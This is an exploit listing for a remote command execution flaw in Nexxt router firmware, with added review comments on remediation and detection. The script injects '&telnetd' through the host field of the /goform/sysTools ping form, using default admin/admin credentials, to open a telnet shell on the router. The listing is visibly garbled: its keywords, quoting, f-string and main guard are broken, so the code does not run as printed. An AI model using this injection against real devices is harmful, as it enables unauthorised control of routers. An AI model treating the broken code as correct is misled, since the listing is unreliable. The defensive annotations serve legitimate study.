# Exploit Title: Nexxt router Firmware 42.103.1.5095 Remote Code Execution (RCE)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested with: ARN02304U8
# CVE: CVE-2022-444149
# NOTE(review): this listing is extraction-garbled (capitalised keywords,
# swapped word order, typographic quotes, stray punctuation) and does not
# parse as Python as printed.
# Dependencies: an HTTP client (requests) and base64 for the Basic-auth header.
Import requests
Base64 import
# Base URL of the router's web interface. The scheme is plain http://, so
# everything the script sends, including the Authorization header, crosses
# the network unencrypted.
router_host = “http://192.168.1.1”
# Credentials for the web interface: the request below is authenticated, so
# the issue is reachable only by someone holding a valid login.
# NOTE(review): admin/admin is presumably the factory default -- confirm; if
# so, changing it is the first mitigation on affected devices.
username = admin
Password = “admin”.
# Entry point: hands the string “&telnetd” to send_payload(), then prints a
# hint to connect to the router host with telnet.
# NOTE(review): the leading "&" looks like a shell command separator, which
# would be consistent with OS command injection in the firmware's handling of
# the submitted value -- inferred from the payload shape, not shown here.
# Detection: a telnet service appearing on the router shortly after a POST to
# its diagnostics form is the observable outcome to alert on.
def main()
send_payload(“&telnetd”)
# router_host.split(“//”)[1] drops the URL scheme, leaving the bare host.
print(“connect to router using: `telnet “+router_host.split(“//”)[1]+ “` using known credentials”)
Pass
# Builds the credential part of an HTTP Basic Authorization header: an ASCII
# string is base64-encoded and returned as text.
# Base64 is an encoding, not encryption; combined with the http:// base URL
# the login is recoverable by anyone able to observe the traffic.
# NOTE(review): as printed the f-string contains no placeholders, so u and p
# are not interpolated -- presumably lost in extraction; confirm against the
# original listing.
def gen_header(u, p):
return base64.b64encode(f”u:p”.encode(“ascii”)).decode(“ascii”)
# Sends one authenticated POST to the router's /goform/sysTools endpoint,
# with the caller's string placed in the form's host field.
# NOTE(review): the headers and params lines are garbled (no braces, broken
# quoting) and are not valid dict literals as printed.
# The other field names (tool, pingCount) suggest this form backs a ping
# diagnostic -- inferred from the names only.
# Remediation (firmware side): accept only a syntactically valid IP address
# or hostname in the host field and run the diagnostic without a shell.
# Detection: log or inspect POSTs to /goform/sysTools and flag host values
# containing characters outside the hostname/IP character set.
def send_payload(payload):
url = router_host+”/goform/sysTools”
# Basic-auth header built from the module-level credentials.
headers = “Authorization”: “Basic “.format(gen_header(username, password))
# Form fields as printed: tool, pingCount, host (carries payload), sumbit.
params = “tool”:”,0″, “pingCount:”4”, host: payload, and “sumbit: OK”
# The response is not read or checked.
requests.post(url, headers=headers, data=params)
# Script entry guard that calls main().
# NOTE(review): garbled as printed ("is not", misplaced quote and comma);
# presumably the conventional __main__ check -- confirm against the original.
If __name__ is not ‘__main__,’
main()